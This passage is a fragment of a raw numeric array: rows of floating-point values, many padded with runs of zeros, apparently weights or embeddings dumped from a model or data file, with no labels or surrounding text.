0.300603, -0.613163, 0.0616253, 0.350715, 0.421411, -1.80822, -0.362602, 0.15625, 0.810206, 0.494677, 0.36304, 0.134838, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.305499, -1.36809, 
-0.897191, 0.16324, -0.0537624, -1.76725, 0.19866, 0.959929, -1.31451, -0.374752, -0.379648, -0.0288494, 0.67931, -1.08641, -1.00468, 0.242516, -0.0887891, 0.282322, 1.38978, 0.0189617, -0.130518, -0.222661, 0.0439412, -0.657488, -0.040205, -0.137837, 0.185392, -0.103038, -0.524786, 0.791836, -2.3092, -0.130565, -0.210563, -2.22525, -0.224688, 1.78894, -0.519782, -0.0271772, 0.304988, -3.10638, -0.00897779, 1.13572, -0.0887703, 0.987188, -5.08807, -0.450802, 0.311268, -0.390058, 0.323951, 0.328965, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0191263, -0.418456, 0.452322, -0.238467, -0.112677, -0.235209, 0.212761, -1.09604, 0.363125, 0.117596, -0.182755, -0.0975529, -0.0161226, -0.367314, -0.0915179, 0.101627, 0.0974315, -0.536829, 0.123893, 0.0219319, 0.27775, -0.225176, -0.111677, 0.76017, 0.0215625, -0.116349, -0.0467867, -0.313611, -0.19544, 0.0396059, -0.294498, -0.00552971, -0.224887, 0.0624598, -0.301326, -0.260893, 0.674446, 0.0237578, 0.0168947, 0.00622512, -0.165693, -0.105525, -0.161539, 0.617691, 0.181878, -0.234296, -0.240376, -0.247368, -0.365781, -0.0939311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.091001, 0.25656, -0.608789, 0.183065, 0.0473472, -0.759469, -0.155636, -0.119357, -0.492142, 0.222888, 1.01262, -0.433153, -1.4502, -0.300433, 0.460652, 0.270285, 0.163257, -1.0764, -0.167757, -0.00327904, 0.353072, 0.455501, -1.2675, 1.35832, 0.0466162, 0.124031, -0.93028, -0.781948, -0.509139, 0.14309, 0.41433, -0.405457, -0.0591647, 0.446954, 0.80832, 0.562178, -0.250126, -0.0116856, 0.143125, 0.036164, -0.125994, -0.408616, -0.0498638, 
-2.15491, 0.762678, 0.125758, 0.361817, -0.584534, 1.01374, -0.314836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0234389, 0.725585, -0.384933, -0.306292, 0.36939, -0.739353, 0.526265, -0.772382, -0.171467, 0.919115, 0.350508, 0.0188862, 0.0329671, -0.137933, -0.612269, 1.41503, -0.79095, -0.395399, 0.214039, 0.0208286, 0.142773, -0.00828377, -0.198207, -0.930739, -0.00781282, -0.583073, 0.361856, -0.127102, 0.200032, 0.236209, 0.592643, -0.0179021, -0.207299, -0.55551, -0.237931, -0.0434666, -2.24851, -0.0472458, 0.569512, -0.358771, 0.0489592, 0.274148, -0.0542157, 1.33758, 0.0467939, 0.1089, 0.0130381, 0.228929, -0.421405, 0.0426977, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1677, 1.093, 0.2632, -0.2913, 0.292, -0.3928, 0.005524, -0.248, -0.05212, 0.1892, 0.11194, 0.518, 0.3223, -0.9653, 0.3777, -0.04855, -0.3613, -0.297, -0.4028, 0.013054, 0.05862, -0.1475, 0.2783, -0.03552, 0.03745, -0.1763, 0.6655, 0.4592, 0.1511, -0.1422, -0.3147, 0.1642, 0.39, -0.544, 0.2217, -0.4768, -0.3103, -0.003548, 0.293, 0.266, 0.269, -0.1329, 0.2559, 0.0801, -0.05716, -0.1099, 0.02507, 0.3074, 0.02931, -0.1103], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.004, 1.688, -1.09, -0.779, -0.6294, 1.943, 0.2556, -1.994, -0.346, 0.08545, -2.63, -0.02248, -0.7905, 1.716, -0.3132, -0.558, -0.0273, -1.2295, -0.579, 0.01668, 0.4563, -1.253, 0.2212, -1.21, 0.010025, -0.408, 0.501, -1.394, 0.228, -0.2488, 0.5796, 0.1198, -0.367, 2.395, 0.002527, -0.4883, 0.3486, 0.02551, 0.03424, -0.713, 0.03412, 0.954, 0.454, -2.348, 0.0899, -1.359, 1.065, -0.4785, 0.4695, 0.1465], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3547, -1.341, -0.8076, -0.2468, 0.1427, 0.8984, 0.231, 1.069, -0.3367, 0.1008, -0.1318, 0.1458, -0.2162, 1.121, -0.1875, 1.572, -0.3982, 0.0185, -0.01346, -0.02171, 0.01874, -0.2996, 0.7007, 0.1736, 0.0207, 0.4453, -0.10187, 0.03096, 0.2942, 0.6943, -5.816, -0.344, 0.512, 0.6025, 0.03262, 0.1893, 0.2301, 0.03555, 0.472, -1.487, -0.3345, -0.1076, 0.611, -0.596, -0.1573, 0.2957, -0.4995, -0.4373, -0.5054, 0.2047], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09814, -4.016, -4.016, -1.025, -2.723, -3.432, 0.1642, -2.838, 1.182, -2.979, 1.491, 0.9453, 0.0896, 4.21, 2.736, 2.676, 0.1164, -16.03, -5.008, 0.02148, -3.168, 1.455, -1.771, -0.03075, -0.0171, 2.39, 0.824, 0.4626, -0.02039, 1.523, 1.419, 1.315, -0.938, -5.24, -2.322, -0.563, -3.256, 0.011665, -1.817, -4.375, -0.2172, -2.12, -0.7246, 1.583, -1.088, 0.496, 0.0003335, -2.678, -1.597, -1.539], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, -0.8467, 1.045, 0.3315, 0.1229, 0.357, -1.098, -0.2502, -2.365, 0.5317, 0.564, -0.3281, -2.58, 0.0218, -2.283, -0.2483, -1.0205, -0.4614, -1.313, 1.252, 0.004326, -2.957, 0.09937, 0.8184, 2.846, -0.03088, 0.823, -0.3687, -0.3564, 0.1531, 0.427, -2.164, -0.702, 0.943, 0.01339, 0.3335, 0.527, -2.26, -0.007336, -0.0454, 0.904, 0.7607, -2.377, 0.0191, -0.7427, 1.05, 0.5234, -0.2338, 0.079, 0.4988, 0.3906], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02048, -0.516, 0.5806, -0.10876, -0.02945, -0.2512, -0.1671, -0.02975, -0.2935, 0.05273, 0.866, 0.04712, 0.3738, 0.02087, -0.005604, 0.2627, 0.064, -0.423, 0.385, 0.01851, 0.268, -0.1357, 0.02525, -1.258, -0.01941, -0.1289, 0.0714, -0.03625, -0.3423, -0.12085, -0.02531, -0.3813, -0.05325, -0.2915, -0.6187, -0.2166, 0.752, -0.00676, -0.08356, -0.1754, 0.203, 0.04495, 0.273, -0.4702, -0.05984, -0.003504, -0.3787, -0.0492, -0.91, 0.03305], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2465, -0.000712, 0.03116, -0.3818, -0.2008, 0.0647, 0.0435, -0.2637, 0.09546, -0.2349, -0.08484, -0.2062, -0.2693, 0.573, -0.04385, -0.113, 0.04434, -0.2141, 0.2957, 0.04654, -0.02068, 0.0716, -0.447, -0.4043, 0.0069, -0.1166, -0.4065, -0.258, 0.04965, -0.01379, -0.155, 0.01604, -0.0787, -0.308, 0.2274, -0.007572, 0.4697, -0.047, 0.2372, 0.013565, -0.0857, 0.04617, 0.005505, -0.96, -0.1128, -0.1505, 0.171, 0.1923, 0.05737, 0.2292], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.197, -0.1536, -0.01258, -0.0478, 0.069, -0.04745, 0.1175, 0.012886, -0.1218, 0.05362, 0.2416, -0.1874, -0.1833, -1.046, -0.0709, 0.3003, -0.02048, -0.05188, -0.0715, 0.04532, 0.4236, -0.1324, -0.376, 0.356, -0.02734, 0.7197, -0.5015, 0.0862, -0.04205, -0.5024, 0.12134, -0.03162, -0.2346, -0.4258, 0.1377, 0.2362, 1.229, 0.001817, -0.03622, 0.2344, -0.2119, -0.1433, -0.11035, -0.8813, -0.1638, -0.5654, 0.07184, -0.10144, 0.3762, 0.083], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0079, -0.733, -0.02264, 0.2317, -0.1412, 0.08276, -0.06204, 0.2822, 0.149, -0.2063, 0.501, -0.03445, 0.1549, -0.232, -0.6074, -0.1465, 0.3218, 0.4402, 0.2175, 0.0233, 0.013214, -0.0341, 0.5913, -0.2683, 0.03885, 0.3975, -0.02505, 0.1516, -0.2151, -0.1771, 0.01501, -0.476, 0.01823, 0.3572, 0.6743, -0.2764, -0.492, -0.03696, -0.1536, 0.1113, -0.1359, 0.3037, -0.004055, -0.724, -0.4329, 0.12366, -0.4277, -0.4307, 0.66, 0.0149], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0694, -0.3572, -0.0797, -0.1587, 0.1421, -0.02989, -0.1342, 0.0269, 0.0206, -0.1859, -0.0914, -0.1891, -0.107, -0.01674, 0.0714, 0.02571, 0.4155, 0.01665, 0.3494, -0.0413, 0.0399, 0.2705, -0.3562, 0.5293, 0.0334, 0.1068, -0.0595, -0.0982, -0.05847, 0.1638, 0.0997, -0.00914, -0.2448, 0.1567, -0.203, 0.1192, 0.498, -0.01499, -0.691, 0.1163, -0.001963, 0.1622, -0.08923, -0.4424, 0.01558, 0.3157, -0.2314, -0.1498, -0.08923, 0.10126], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.224, -2.688, -0.519, -2.805, -0.993, -0.2654, 1.09, -0.69, 0.6855, -0.849, -0.1638, -0.3933, 0.1016, 1.0205, -1.686, 1.02, -0.7876, -0.7603, -0.583, -0.01431, -1.247, -0.4097, 1.308, -2.43, 0.02089, -0.3984, -0.642, 0.0295, -0.4976, -0.761, -5.0, 0.782, 0.436, 3.045, -0.9453, 0.4495, 0.438, -0.010345, -0.391, -1.794, 0.2803, -0.03934, 0.2986, -0.7485, 0.05582, 0.254, -0.301, 0.6094, -0.2715, -0.2235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.207, -0.684, -0.2307, -2.1, -0.499, -3.615, 1.2705, -2.338, -1.82, 0.9336, -1.449, -2.213, 0.6543, 0.418, -0.0253, 2.979, -0.372, -0.645, -3.746, 0.01775, -0.6104, -0.05637, -0.9897, -4.312, -0.0295, -4.785, -4.965, 0.8423, -0.1815, -3.037, 3.055, 2.176, -4.63, -10.43, -3.58, -2.258, -1.034, -0.03772, -2.566, 2.295, 0.1971, -1.525, -1.73, 4.94, -1.826, -2.732, -2.26, -2.408, -1.115, -1.1875], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2499, -1.087, 0.379, -0.5625, -0.312, -0.576, 0.2091, 0.002441, 0.1512, 0.4072, -0.2433, -0.7495, -0.4255, 0.3086, -0.6523, 0.4587, 0.3308, -0.724, -0.422, -0.0427, -0.1351, 0.877, -0.195, -0.582, 0.04242, -0.9507, -0.1897, -0.7686, -0.2695, -0.07544, -0.04727, -0.1667, -0.2311, 0.3513, 0.259, -0.2491, -1.07, -0.002342, -0.599, -1.082, -0.671, -1.53, -0.3416, 2.375, -0.0967, 0.2627, 0.7524, -0.237, -0.543, 0.1169], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00675, -0.2299, -0.01758, -0.1187, -0.2343, 0.2476, 0.26, -2.334, -0.04282, -0.0685, -0.2145, -0.03787, -0.1678, 0.8813, 0.1658, 0.4556, 0.147, 0.0364, 0.4333, -0.007786, -0.1469, 0.328, -0.3315, 0.5347, -0.01426, 0.1104, -0.1159, -0.428, 0.02469, -0.1293, -1.019, 0.0893, 0.1478, -0.616, 0.3503, -0.178, -0.36, -0.01434, 0.1444, -0.4512, -0.4316, 0.286, -0.2208, 1.604, -0.3445, 0.005417, 0.709, 0.271, 0.1005, 0.03494], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09235, -0.4072, 0.197, -0.013596, -0.53, -0.6, -0.12085, 0.5176, 0.1393, -0.4302, -0.4543, -0.641, -0.662, -0.04498, -0.3596, 0.1577, 0.3796, -0.8047, 0.248, -0.0023, 0.4336, 0.1709, -0.9854, 0.1952, 0.02985, -0.616, -1.614, -0.01566, 0.4292, -0.1399, -0.733, 0.2527, 0.4038, -0.839, -0.722, -0.1203, 0.4277, 0.01284, 0.1268, -0.663, 0.032, -1.025, -0.2148, -4.71, -0.04242, -0.3003, 0.4607, 0.4023, -0.5225, 0.03072], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.513, 1.877, -0.703, 0.1296, 0.6387, -5.29, 0.0826, -0.7036, -0.2632, -0.915, -0.566, -2.102, -0.4734, 0.458, 0.4539, 0.3105, -0.1346, -0.164, 1.159, 0.03937, 0.1068, 0.0503, -0.3796, -0.3352, -0.01595, 0.1967, 0.3782, -0.918, 0.685, -5.59, 3.463, -0.1538, -0.9214, -0.247, -0.813, -0.4238, 0.1693, -0.02199, -2.172, -0.2834, -0.1203, 0.0748, -0.1825, 2.162, -3.926, -0.07654, -3.95, -0.652, -0.08545, -0.4646], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2144, -0.382, 0.3762, -3.68, -0.3582, -1.329, -0.5356, 2.045, 0.6953, -0.9507, -0.2252, 0.66, -0.511, 1.518, -0.1126, -0.7153, 0.2825, -0.429, 1.185, 0.0442, 0.03677, 0.6606, -0.3499, -0.8125, -0.03006, 0.1597, -1.041, 0.8877, 0.2146, -0.886, -0.7305, -0.07654, 0.1841, 0.5625, -2.248, 0.1123, 1.111, -0.02628, -0.01898, -0.875, -0.3604, -0.8647, -0.2793, 0.3252, -3.387, 0.000314, 0.3757, -0.1212, -3.252, 0.4495], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06204, -0.127, 0.01333, 0.615, -0.5083, -0.2324, -0.08984, -2.744, -0.2144, -0.7554, 0.02829, -0.48, 0.10724, -0.564, -0.1615, 0.01678, 0.3381, 0.9575, 0.5654, 0.04697, 0.1361, 0.1151, -0.574, -1.687, 0.02774, 0.4082, -0.512, -0.127, -0.163, -0.677, -0.123, -0.08813, 0.2008, 0.4258, 0.09656, -0.0753, -0.7505, -0.007072, -0.391, -0.0878, 0.005978, 0.588, -0.005154, -0.376, 0.788, 0.2527, 0.5615, -0.2446, 0.167, -0.2388], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2152, -0.3323, 0.5815, 0.8496, 0.2329, -0.3848, 0.4548, 1.066, -1.532, -0.4375, -0.000891, -0.8643, 0.744, -0.247, -0.748, -1.028, -0.6475, 0.4124, 1.269, -0.0089, 0.7603, 0.014305, -0.5195, -0.236, 0.003265, 0.2191, -1.037, -0.5806, 0.1332, -0.4612, -1.724, 0.4407, 0.589, 0.00984, 0.3486, -0.7686, -0.3003, -0.02402, -0.645, -3.924, -0.04477, -0.1476, -0.0905, 0.567, 0.828, -0.525, -0.719, 0.2308, -1.196, -1.165], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2175, 0.333, 0.4937, 0.04175, -0.2301, -0.1752, 0.4104, 0.1885, 0.1918, 0.1936, 0.1189, -0.0554, -0.00472, -0.1534, -0.001394, -0.10266, 0.1626, -0.1302, -0.1288, -0.03998, -0.1746, -0.04276, -0.0819, 0.379, 0.01402, -0.0627, -0.12415, -0.07965, 0.00867, 0.00068, -0.0576, 0.03912, -0.1843, -0.2559, 0.1814, 0.3154, 0.3667, 0.0025, 0.2979, -0.3638, 0.04285, -0.00938, -0.1559, 0.11383, -0.2462, -0.0006285, 0.0999, 0.0401, 0.3157, 0.02695], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0362, -0.07996, -0.01227, -0.2487, 0.1231, -0.2043, -0.02386, 0.11694, 0.01313, 0.039, 0.10376, 0.0377, 0.01768, 0.05212, -0.2036, -0.1719, -0.05786, -0.251, -0.05133, -0.006294, 0.05814, -0.0891, 0.06024, -0.562, 0.01136, -0.1989, 0.088, -0.03665, -0.1285, -0.01888, -0.3018, -0.098, -0.0511, -0.0007734, -0.0635, -0.03506, -0.086, 0.004528, 0.05334, 0.0726, 0.2075, 0.08026, 0.1888, -0.3113, -0.03705, 0.07294, 0.02449, -0.06384, -0.0677, 0.1196], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4473, 2.344, -0.719, -0.475, -1.044, 1.878, 0.9546, 0.3433, 0.769, -0.008896, 1.27, -0.06168, -1.067, -1.233, -0.897, 0.783, -0.6646, -1.414, -0.429, 0.01709, 0.1489, -0.466, -1.039, -1.35, 0.02756, -1.314, -0.2018, -0.6567, 0.3306, 0.0687, 0.8687, 0.4749, -0.681, 0.559, 0.1361, -1.094, 1.975, 0.04102, -0.3203, -0.573, 0.2284, 0.1986, -0.518, -0.7593, 0.1368, -0.8047, 1.227, 1.216, 0.2717, 0.9775], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0592, 0.515, 0.2391, -0.254, -0.0638, -0.243, 0.1393, -4.484, -0.7725, 0.2034, -0.3574, -0.5073, 0.1371, -3.871, -0.1265, -1.81, -0.054, 0.1715, -0.2993, -0.02986, -0.01842, -0.7686, -0.0386, 0.624, 0.02658, 0.2052, 0.199, 0.2015, -0.07874, -2.158, -1.199, 0.1611, -0.0799, 0.332, 0.2145, 0.07135, 0.574, -0.0412, -0.08887, -0.3523, -0.1562, 0.03757, -0.4849, -0.1816, -0.004436, 0.1979, -2.096, 0.03436, 0.1345, -0.2559], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 